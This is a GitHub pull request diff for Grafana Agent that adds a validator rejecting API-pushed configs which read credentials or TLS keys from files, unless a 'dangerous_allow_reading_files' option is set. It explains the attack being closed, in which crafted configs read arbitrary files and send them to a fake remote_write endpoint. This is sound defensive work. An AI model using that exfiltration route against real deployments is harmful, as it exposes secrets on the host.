Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Scraping service: harden security restrictions on instance files #558

Merged
merged 4 commits into from
Apr 26, 2021
Merged
Show file tree
Hide file tree
Changes from 2 commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
6 changes: 6 additions & 0 deletions docs/api.md
Original file line number Diff line number Diff line change
Expand Up @@ -108,6 +108,12 @@ defined in the Configuration Reference. The name field of the configuration is
ignored and the name in the URL takes precedence. The request body must be
formatted as YAML.

**WARNING**: By default, all instance configuration files that read
credentials from a file on disk will be rejected. This prevents malicious users
from reading the contents of arbitrary files as passwords and sending their
contents to fake remote_write endpoints. To change the behavior, set
`dangerous_allow_reading_files` to true in the `scraping_service` block.

Status code: 201 with a new config, 200 on updated config.
Response on success:

Expand Down
26 changes: 18 additions & 8 deletions docs/configuration-reference.md
Original file line number Diff line number Diff line change
Expand Up @@ -243,9 +243,19 @@ agents distribute discovery and scrape load between nodes.
# reshard_interval). A timeout of 0 indicates no timeout.
[reshard_timeout: <duration> | default = "30s"]
# Configuration for the KV store to store metrics
# Configuration for the KV store to store configurations.
kvstore: <kvstore_config>
# When set, allows configs pushed to the KV store to specify configuration
# fields that can read secrets from files.
#
# This is disabled by default. When enabled, a malicious user can craft an
# instance config that reads arbitrary files on the machine the Agent runs
# on and sends its contents to a specically crafted remote_write endpoint.
#
# If enabled, ensure that no untrusted users have access to the Agent API.
[dangerous_allow_reading_files: <boolean>]
# Configuration for how agents will cluster together.
lifecycler: <lifecycler_config>
```
Expand Down Expand Up @@ -2045,7 +2055,7 @@ remote_write:
[ sending_queue: <otlpexporter.sending_queue> ]
[ retry_on_failure: <otlpexporter.retry_on_failure> ]

# This processor writes a well formatted log line to a Loki instance for each span, root, or process
# This processor writes a well formatted log line to a Loki instance for each span, root, or process
# that passes through the Agent. This allows for automatically building a mechanism for trace
# discovery and building metrics from traces using Loki.
automatic_logging:
Expand All @@ -2063,7 +2073,7 @@ remote_write:
[ process_attributes: <string array> ]
# timeout on sending logs to Loki
[ timeout: <duration> | default = 1ms ]
overrides:
overrides:
[ loki_tag: <string> | default = "tempo" ]
[ service_key: <string> | default = "svc" ]
[ span_name_key: <string> | default = "span" ]
Expand Down Expand Up @@ -2122,7 +2132,7 @@ tail_sampling:
decision_wait: [ <string> | default="5s" ]
# load_balancing configures load balancing of spans across multiple agents.
# It ensures that all spans of a trace are sampled in the same instance.
# It's not necessary when only one agent is receiving traces (e.g. single instance deployments).
# It's not necessary when only one agent is receiving traces (e.g. single instance deployments).
load_balancing:
# resolver configures the resolution strategy for the involved backends
# It can be static, with a fixed list of hostnames, or DNS, with a hostname (and port) that will resolve to all IP addresses.
Expand All @@ -2141,22 +2151,22 @@ tail_sampling:
exporter:
# Controls whether compression is enabled.
[ compression: <string> | default = "gzip" | supported = "none", "gzip"]

# Controls whether or not TLS is required. See https://godoc.org/google.golang.org/grpc#WithInsecure
[ insecure: <boolean> | default = false ]

# Disable validation of the server certificate. Only used when insecure is set
# to false.
[ insecure_skip_verify: <bool> | default = false ]

# Sets the `Authorization` header on every trace push with the
# configured username and password.
# password and password_file are mutually exclusive.
basic_auth:
[ username: <string> ]
[ password: <secret> ]
[ password_file: <string> ]

```

### integrations_config
Expand Down
143 changes: 138 additions & 5 deletions pkg/prom/cluster/cluster.go
Original file line number Diff line number Diff line change
Expand Up @@ -14,6 +14,22 @@ import (
"github.com/grafana/agent/pkg/prom/instance/configstore"
"github.com/grafana/agent/pkg/util"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/common/config"
"github.com/prometheus/prometheus/discovery"
"github.com/prometheus/prometheus/discovery/azure"
"github.com/prometheus/prometheus/discovery/consul"
"github.com/prometheus/prometheus/discovery/digitalocean"
"github.com/prometheus/prometheus/discovery/dns"
"github.com/prometheus/prometheus/discovery/dockerswarm"
"github.com/prometheus/prometheus/discovery/ec2"
"github.com/prometheus/prometheus/discovery/eureka"
"github.com/prometheus/prometheus/discovery/hetzner"
"github.com/prometheus/prometheus/discovery/kubernetes"
"github.com/prometheus/prometheus/discovery/marathon"
"github.com/prometheus/prometheus/discovery/openstack"
"github.com/prometheus/prometheus/discovery/scaleway"
"github.com/prometheus/prometheus/discovery/triton"
"github.com/prometheus/prometheus/discovery/zookeeper"
"google.golang.org/grpc"
)

Expand All @@ -22,9 +38,9 @@ import (
type Cluster struct {
mut sync.RWMutex

log log.Logger

cfg Config
log log.Logger
cfg Config
baseValidation ValidationFunc

//
// Internally, Cluster glues together four separate pieces of logic.
Expand Down Expand Up @@ -55,7 +71,7 @@ func New(
l = log.With(l, "component", "cluster")

var (
c = &Cluster{log: l, cfg: cfg}
c = &Cluster{log: l, cfg: cfg, baseValidation: validate}
err error
)

Expand All @@ -74,7 +90,7 @@ func New(
if err != nil {
return nil, fmt.Errorf("failed to initialize configstore: %w", err)
}
c.storeAPI = configstore.NewAPI(l, c.store, validate)
c.storeAPI = configstore.NewAPI(l, c.store, c.storeValidate)
reg.MustRegister(c.storeAPI)

c.watcher, err = newConfigWatcher(l, cfg, c.store, im, c.node.Owns, validate)
Expand All @@ -87,6 +103,123 @@ func New(
return c, nil
}

func (c *Cluster) storeValidate(cfg *instance.Config) error {
c.mut.RLock()
defer c.mut.RUnlock()

if err := c.baseValidation(cfg); err != nil {
return err
}

if c.cfg.DangerousAllowReadingFiles {
return nil
}

// If configs aren't allowed to read from the store, we need to make sure no
// configs coming in from the API set files for passwords.
for i, rw := range cfg.RemoteWrite {
if err := validateNoFiles(&rw.HTTPClientConfig); err != nil {
return fmt.Errorf("failed to validate remote_write at index %d: %w", i, err)
}
}

for i, sc := range cfg.ScrapeConfigs {
if err := validateNoFiles(&sc.HTTPClientConfig); err != nil {
return fmt.Errorf("failed to validate scrape_config at index %d: %w", i, err)
}

for j, disc := range sc.ServiceDiscoveryConfigs {
if err := validateDiscoveryNoFiles(disc); err != nil {
return fmt.Errorf("failed to validate service discovery at index %d withini scrape_config at index %d: %w", j, i, err)
}
}
}

return nil
}

func validateNoFiles(cfg *config.HTTPClientConfig) error {
checks := []struct {
name string
check func() bool
}{
{"bearer_token_file", func() bool { return cfg.BearerTokenFile != "" }},
{"password_file", func() bool { return cfg.BasicAuth != nil && cfg.BasicAuth.PasswordFile != "" }},
{"credentials_file", func() bool { return cfg.Authorization != nil && cfg.Authorization.CredentialsFile != "" }},
{"ca_file", func() bool { return cfg.TLSConfig.CAFile != "" }},
{"cert_file", func() bool { return cfg.TLSConfig.CertFile != "" }},
{"key_file", func() bool { return cfg.TLSConfig.KeyFile != "" }},
}
for _, check := range checks {
if check.check() {
return fmt.Errorf("%s must be empty unless dangerous_allow_reading_files is set", check.name)
}
}
return nil
}

func validateDiscoveryNoFiles(disc discovery.Config) error {
switch d := disc.(type) {
case *azure.SDConfig:
// no-op
case *consul.SDConfig:
if err := validateNoFiles(&config.HTTPClientConfig{TLSConfig: d.TLSConfig}); err != nil {
return err
}
case *digitalocean.SDConfig:
if err := validateNoFiles(&d.HTTPClientConfig); err != nil {
return err
}
case *dns.SDConfig:
// no-op
case *dockerswarm.SDConfig:
if err := validateNoFiles(&d.HTTPClientConfig); err != nil {
return err
}
case *ec2.SDConfig:
// no-op
case *eureka.SDConfig:
if err := validateNoFiles(&d.HTTPClientConfig); err != nil {
return err
}
case *hetzner.SDConfig:
if err := validateNoFiles(&d.HTTPClientConfig); err != nil {
return err
}
case *kubernetes.SDConfig:
if err := validateNoFiles(&d.HTTPClientConfig); err != nil {
return err
}
case *marathon.SDConfig:
if err := validateNoFiles(&d.HTTPClientConfig); err != nil {
return err
}
if d.AuthTokenFile != "" {
return fmt.Errorf("auth_token_file must be empty unless dangerous_allow_reading_files is set")
}
case *openstack.SDConfig:
if err := validateNoFiles(&config.HTTPClientConfig{TLSConfig: d.TLSConfig}); err != nil {
return err
}
case *scaleway.SDConfig:
if err := validateNoFiles(&d.HTTPClientConfig); err != nil {
return err
}
case *triton.SDConfig:
if err := validateNoFiles(&config.HTTPClientConfig{TLSConfig: d.TLSConfig}); err != nil {
return err
}
case *zookeeper.NerveSDConfig:
// no-op
case *zookeeper.ServersetSDConfig:
// no-op
default:
return fmt.Errorf("unknown service discovery %s; rejecting config for safety. set dangerous_allow_reading_files to ignore", d.Name())
}

return nil
}

// Reshard implements agentproto.ScrapingServiceServer, and syncs the state of
// configs with the configstore.
func (c *Cluster) Reshard(ctx context.Context, _ *agentproto.ReshardRequest) (*empty.Empty, error) {
Expand Down
2 changes: 2 additions & 0 deletions pkg/prom/cluster/config.go
Original file line number Diff line number Diff line change
Expand Up @@ -21,6 +21,8 @@ type Config struct {
KVStore kv.Config `yaml:"kvstore"`
Lifecycler ring.LifecyclerConfig `yaml:"lifecycler"`

DangerousAllowReadingFiles bool `yaml:"dangerous_allow_reading_files"`

// TODO(rfratto): deprecate scraping_service_client in Agent and replace with this.
Client client.Config `yaml:"-"`
}
Expand Down